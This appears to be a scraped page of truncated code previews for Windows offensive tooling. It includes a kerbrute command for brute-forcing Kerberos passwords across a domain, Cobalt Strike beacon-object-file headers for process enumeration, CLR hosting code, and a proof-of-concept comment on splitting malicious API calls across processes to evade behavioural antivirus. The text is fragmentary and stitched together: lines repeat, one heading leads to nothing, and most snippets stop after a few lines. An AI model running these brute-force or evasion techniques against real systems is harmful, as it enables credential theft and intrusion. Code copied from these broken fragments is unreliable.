With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
#include <windows.h> | |
#include <stdio.h> | |
#include <dsgetdc.h> | |
#include <psapi.h> | |
extern "C" { | |
#include "beacon.h" | |
}; | |
// Compile as C++ (/TP) for decltype |
#include "stdafx.h" | |
int main() | |
{ | |
ICLRMetaHost *metaHost = NULL; | |
IEnumUnknown *runtime = NULL; | |
ICLRRuntimeInfo *runtimeInfo = NULL; | |
ICLRRuntimeHost *runtimeHost = NULL; | |
IUnknown *enumRuntime = NULL; | |
LPWSTR frameworkName = NULL; |
#include <string.h> | |
#include <stdio.h> | |
#include <windows.h> | |
#include <psapi.h> | |
#include "beacon.h" | |
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD); | |
DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD); | |
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD); |
/* | |
This is a POC for a generic technique I called internally on our red team assessment "Divide and Conquer", which can be used to bypass behavioral based NextGen AV detection. It works by splitting malicious actions and API calls into distinct processes. | |
*/ | |
#include <stdio.h> | |
#include <tchar.h> | |
#include <windows.h> | |
#include "Commctrl.h" | |
#include <string> |
#define APSTUDIO_READONLY_SYMBOLS | |
#include "winres.h" | |
VS_VERSION_INFO VERSIONINFO | |
FILEVERSION 1,3,3,4 | |
PRODUCTVERSION 1,3,3,1 | |
FILEFLAGSMASK 0x3fL | |
#ifdef _DEBUG | |
FILEFLAGS 0x1L | |
#else |
@echo off | |
:: This batch script should be run from a VS developer prompt. | |
:: rc will create a binary .res file | |
rc Resource.rc | |
:: cvtres will convert the .res file to a COFF object file | |
cvtres /MACHINE:x64 /OUT:Resource.o Resource.res |
#!/bin/bash | |
# This script needs mingw installed | |
# Convert a .rc resource script input file to a .res binary resource output file | |
x86_64-w64-mingw32-windres -J rc -i Resource.rc -O res -o Resource.res | |
# Convert a .res binary resource input file to a COFF object output file | |
x86_64-w64-mingw32-windres -J res -i Resource.res -O coff -o Resource.o |
/* | |
================================ Compile as a .Net DLL ============================== | |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs | |
*/ | |
using System.Windows.Forms; | |
namespace TestNamespace |
#include <windows.h> | |
#include <stdint.h> | |
#include <stdbool.h> | |
#include <stdio.h> | |
#include <sal.h> | |
#include <assert.h> | |
#ifdef _X86_ | |
#error "This snippet only build in 64-bit due to heavy use of uintptr arithmetics." | |
#endif |